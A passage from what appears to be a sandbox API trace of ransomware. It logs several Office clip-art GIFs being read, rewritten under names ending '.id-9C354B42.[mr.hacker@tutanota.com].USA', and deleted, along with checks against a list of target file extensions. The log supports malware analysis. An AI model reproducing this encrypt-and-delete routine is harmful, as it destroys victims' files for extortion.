lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.302] GetLastError () returned 0x0 [0053.302] ReadFile (in: hFile=0x200, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x296f, lpOverlapped=0x0) returned 1 [0053.379] WriteFile (in: hFile=0x228, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2970, lpOverlapped=0x0) returned 1 [0053.380] ReadFile (in: hFile=0x200, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.380] WriteFile (in: hFile=0x228, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.380] SetEndOfFile (hFile=0x228) returned 1 [0053.380] CloseHandle (hObject=0x228) returned 1 [0053.380] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.380] SetEndOfFile (hFile=0x200) returned 1 [0053.381] CloseHandle (hObject=0x200) returned 1 [0053.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.382] lstrlenW (lpString=".doc") returned 4 [0053.382] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.382] lstrlenW (lpString=".docx") returned 5 [0053.382] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.382] lstrlenW (lpString=".pdf") returned 4 [0053.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".xls") returned 4 [0053.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".xlsx") returned 5 [0053.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.382] lstrlenW (lpString=".ppt") returned 4 [0053.382] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.382] lstrlenW (lpString=".zip") returned 4 [0053.382] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".rar") returned 4 [0053.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.383] lstrlenW (lpString=".bz2") returned 4 [0053.383] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.383] lstrlenW (lpString=".7z") returned 3 [0053.383] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.383] lstrlenW (lpString=".dbf") returned 4 [0053.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.383] lstrlenW (lpString=".1cd") returned 4 [0053.383] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.383] lstrlenW (lpString=".jpg") returned 4 [0053.383] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.388] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=6984) returned 1 [0053.388] CloseHandle (hObject=0x220) returned 1 [0053.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 0x20 [0053.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.388] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.388] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.388] GetLastError () returned 0x0 [0053.388] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1b48, lpOverlapped=0x0) returned 1 [0053.390] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1b50, lpOverlapped=0x0) returned 1 [0053.391] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.391] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.391] SetEndOfFile (hFile=0x204) returned 1 [0053.391] CloseHandle (hObject=0x204) returned 1 [0053.391] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.391] SetEndOfFile (hFile=0x220) returned 1 [0053.392] CloseHandle (hObject=0x220) returned 1 [0053.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.392] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0053.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".doc") returned 4 [0053.393] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString=".docx") returned 5 [0053.393] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.393] lstrlenW (lpString=".pdf") returned 4 [0053.393] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".xls") returned 4 [0053.393] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".xlsx") returned 5 [0053.393] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.393] lstrlenW (lpString=".ppt") returned 4 [0053.393] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".zip") returned 4 [0053.393] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".rar") returned 4 [0053.393] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".bz2") returned 4 [0053.393] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString=".7z") returned 3 [0053.393] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".dbf") returned 4 [0053.393] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".1cd") returned 4 [0053.393] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".jpg") returned 4 [0053.393] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.394] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=13254) returned 1 [0053.394] CloseHandle (hObject=0x220) returned 1 [0053.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 0x20 [0053.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.394] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.394] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.395] GetLastError () returned 0x0 [0053.395] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x33c6, lpOverlapped=0x0) returned 1 [0053.397] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x33d0, lpOverlapped=0x0) returned 1 [0053.398] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.398] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.398] SetEndOfFile (hFile=0x204) returned 1 [0053.398] CloseHandle (hObject=0x204) returned 1 [0053.398] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.398] SetEndOfFile (hFile=0x220) returned 1 [0053.399] CloseHandle (hObject=0x220) returned 1 [0053.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.399] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".doc") returned 4 [0053.400] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString=".docx") returned 5 [0053.400] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.400] lstrlenW (lpString=".pdf") returned 4 [0053.400] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.400] lstrlenW (lpString=".xls") returned 4 [0053.400] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.400] lstrlenW (lpString=".xlsx") returned 5 [0053.400] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.400] lstrlenW (lpString=".ppt") returned 4 [0053.400] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".zip") returned 4 [0053.400] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.400] lstrlenW (lpString=".rar") returned 4 [0053.400] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.400] lstrlenW (lpString=".bz2") returned 4 [0053.400] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString=".7z") returned 3 [0053.400] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".dbf") returned 4 [0053.400] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".1cd") returned 4 [0053.400] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.401] lstrlenW (lpString=".jpg") returned 4 [0053.401] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.402] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=8582) returned 1 [0053.402] CloseHandle (hObject=0x220) returned 1 [0053.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 0x20 [0053.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.402] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.402] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.403] GetLastError () returned 0x0 [0053.403] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2186, lpOverlapped=0x0) returned 1 [0053.406] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2190, lpOverlapped=0x0) returned 1 [0053.407] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.407] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.407] SetEndOfFile (hFile=0x204) returned 1 [0053.407] CloseHandle (hObject=0x204) returned 1 [0053.407] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.408] SetEndOfFile (hFile=0x220) returned 1 [0053.408] CloseHandle (hObject=0x220) returned 1 [0053.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.411] lstrlenW (lpString=".doc") returned 4 [0053.411] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.411] lstrlenW (lpString=".docx") returned 5 [0053.411] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.411] lstrlenW (lpString=".pdf") returned 4 [0053.411] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.411] lstrlenW (lpString=".xls") returned 4 [0053.411] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.411] lstrlenW (lpString=".xlsx") returned 5 [0053.411] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.411] lstrlenW (lpString=".ppt") returned 4 [0053.411] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.411] lstrlenW (lpString=".zip") returned 4 [0053.412] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.412] lstrlenW (lpString=".rar") returned 4 [0053.412] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.412] lstrlenW (lpString=".bz2") returned 4 [0053.412] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.412] lstrlenW (lpString=".7z") returned 3 [0053.412] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.412] lstrlenW (lpString=".dbf") returned 4 [0053.412] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.412] lstrlenW (lpString=".1cd") returned 4 [0053.412] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.412] lstrlenW (lpString=".jpg") returned 4 [0053.412] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.412] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=4894) returned 1 [0053.412] CloseHandle (hObject=0x220) returned 1 [0053.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 0x20 [0053.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.413] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.413] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.413] GetLastError () returned 0x0 [0053.413] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x131e, lpOverlapped=0x0) returned 1 [0053.556] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1320, lpOverlapped=0x0) returned 1 [0053.557] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.557] WriteFile (in: hFile=0x204, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.557] SetEndOfFile (hFile=0x204) returned 1 [0053.558] CloseHandle (hObject=0x204) returned 1 [0053.558] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.558] SetEndOfFile (hFile=0x220) returned 1 [0053.559] CloseHandle (hObject=0x220) returned 1 [0053.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0053.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.882] lstrlenW (lpString=".doc") returned 4 [0053.882] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.882] lstrlenW (lpString=".docx") returned 5 [0053.882] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.882] lstrlenW (lpString=".pdf") returned 4 [0053.882] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.882] lstrlenW (lpString=".xls") returned 4 [0053.882] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.882] lstrlenW (lpString=".xlsx") returned 5 [0053.882] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.882] lstrlenW (lpString=".ppt") returned 4 [0053.882] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.882] lstrlenW (lpString=".zip") returned 4 [0053.882] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.882] lstrlenW (lpString=".rar") returned 4 [0053.882] 